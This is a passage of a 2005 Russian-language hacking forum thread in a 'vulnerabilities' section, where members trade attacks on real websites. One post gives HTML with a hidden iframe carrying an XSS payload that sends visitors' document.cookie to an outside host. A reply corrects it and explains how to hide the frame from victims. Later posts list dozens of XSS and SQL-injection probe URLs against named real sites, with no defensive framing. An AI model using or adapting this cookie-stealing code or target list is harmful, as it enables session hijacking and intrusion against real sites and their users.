HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 23.11.2005, 00:04
dim_ok
Green member - Level 3
Регистрация: 26.03.2005
Сообщений: 191
Провел на форуме:
6768708

Репутация: 185
По умолчанию

хха -) отключи свою банерорезку -) у меня из-за Outpost'а такая же хрень.
__________________
Дайте мне точку опоры и я переверну землю!

irc.antichat.net #antichat
 

  #52  
Старый 23.11.2005, 00:06
Tem
Banned
Регистрация: 05.10.2005
Сообщений: 965
Провел на форуме:
5888800

Репутация: 547


Отправить сообщение для Tem с помощью ICQ
По умолчанию

Я про фреймы читал и знаю, но как эксплотировать нет, и у меня сейчас на часах 2 ночи, както не охота читать, вот мой код.
Код HTML:
<html>
<iframe widht=0 height=0 frameborder=0 src=http://www.mix.az/engine/modules/imagepreview.php?image=');</script><script>img = new Image(); img.src="http://antichat.ru/cgi-bin/s.jpg"+document.cookie;</script>
</iframe>
</html>
Замени его по своему если не трудно, ото я три дня над этим сижу.
 

  #53  
Старый 23.11.2005, 00:20
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

http://antichat.ru/cgi-bin/s.jpg?
вопрос должен в конце стоять.а так вроде все прально.
у тебя должно три страницы
1-главная(в ней тока коды размещения фреймов)
2-Тело, то что будет видеть чел когда зайдет на твой сайт.
3-скрытый фрейм(тот что ты написал вверху)
если у тебя ничо не получиться, я те завтра отпишу готовый пример.
Цитата:
хха -) отключи свою банерорезку -) у меня из-за Outpost'а такая же хрень.
блин точна, я и забыл что велел ему все блокировать, апплеты, флеш, скрытые фреймы, и т.д.

Последний раз редактировалось k1b0rg; 23.11.2005 в 00:22..
 

  #54  
Старый 24.11.2005, 03:09
porter
Познающий
Регистрация: 01.03.2005
Сообщений: 80
Провел на форуме:
606375

Репутация: 12
По умолчанию

k1b0rg попробуй найти xcc на www.wwc.ru
 

  #55  
Старый 24.11.2005, 10:47
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

http://www.footbolka.ru/catalog/index.php?ref=xren'
http://www.whoistar.com/content/view/55/1'/
http://narod.yandex.ru/userforum/message.xhtml?owner=[название_форума_жертвы]&message_id=3042605&thread_id=0&nickname=&email=&v ari=2<script>alert()</script>
http://www.allpravo.ru/?id=88&type=0&query='"
http://www.classis.ru/cgi-bin/links/...EE%F2%E7%FB%E2
http://www.refer.ru/menu?a=select_add&id="><script>alert()</script>
http://test.msk.ru/cgi-bin/searchdip...3C%2Fscript%3E

2porter http://wwc.ru/index.php?do=search&ss...3C%2Fscript%3E
 

  #56  
Старый 24.11.2005, 17:01
max_pain89
Постоянный
Регистрация: 11.12.2004
Сообщений: 592
Провел на форуме:
2260903

Репутация: 345


По умолчанию

 

  #57  
Старый 26.11.2005, 00:48
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

http://www.mtve.com/index.php?Page=2"><script>alert()</script>
http://register.logitech.com/index.cfm?validate=1";</script><script>alert()</script>
http://www.w3.org/Search/Mail/Public...3C%2Fscript%3E
http://serial.com/?show=%3Cscript%3E...&submit=Search
http://www.phpbuilder.com/snippet/browse.php?by=cat&cat=1"style=background:url(javas cript:alert());"
http://poisk.ru/#"><script>alert()</script>
http://an.aport.ru/scripts/template....e=referat&Rt=2
http://www.sexvideogid.ru/search.php...3C%2Fscript%3E
http://www.ag.ru/cheats/baldurs_gate_2_throne_of_bhaal/15170"><script>alert()</script>
http://catalog.aport.ru/rus/themes.aspx?id=1778'"><xz>
http://multifon.ru/stm/stm_popup.php?pid=54&type=jpg&name=666&url="style= background:url(javascript:alert());"
http://www.chestertonholdings.com/inquiry_handler.php отсутствует проверка полей
http://www.iceberg.ru/services/?id=23'&parent=0
 

  #58  
Старый 26.11.2005, 15:14
4NT_0_xa
Новичок
Регистрация: 24.11.2005
Сообщений: 3
Провел на форуме:
3133

Репутация: -2
По умолчанию

http://www.scriptsearch.com/cgi-bin/report.cgi?999=delete&ID=%3Cscript%3Ealert('XSS')% 3C/script%3E
 

  #59  
Старый 26.11.2005, 15:30
k1b0rg
Тут может быть ваша реклама.
Регистрация: 30.07.2005
Сообщений: 1,243
Провел на форуме:
4520553

Репутация: 1316


По умолчанию

http://1ps.ru/pr/ отсутствует проверка полей
http://seminar.spylog.ru/?rp=seminars/descr/15/ отсутствует проверка полей
http://members.yadro.ru/banners/nowstate.php3?vbn_id=-1'
http://hw.ru/hi-tech/Login.jsp?login='"><script>alert(1)</script>&password='"><script>alert(2)</script>
http://www.srb.ru/search-results/?q=...d&ps=10&page=0
http://www.profits.ru/login.php?w=user&o=login&e=u'
http://www.gf.ru/cgi-bin/podftp.cgi?hostname=<script>alert()</script>
http://www.zerkalo.com/cgi-bin/mail/adduser.cgi вводим в дополнительно->наши новости:Разные словосочетания допустим '"><script>!! в поля email и имя, и получаем на выходе http://www.zerkalo.com/cgi-bin/mail/adduser.cgi со строкой/home/ztu22/dead.letter... Saved message in /home/ztu22/dead.letter
http://smchat.ru/?s=reguser&login="><script>alert()</script>
http://www.film.ru/search.asp?what=%...ot&mode=medium
 

  #60  
Старый 26.11.2005, 16:17
4NT_0_xa
Новичок
Регистрация: 24.11.2005
Сообщений: 3
Провел на форуме:
3133

Репутация: -2
По умолчанию

http://forum.utro.ru/newuser.php?Cat=<script>alert('xss')</script>
жмём "далее" - три xss

Последний раз редактировалось 4NT_0_xa; 26.11.2005 в 16:27..
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Избранные сайты k00p3r Болталка 11 13.08.2005 20:30
Обещаю, более на порно сайты не заглядывать, если вы мне поможете. marusucka Болталка 22 17.01.2005 23:37



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ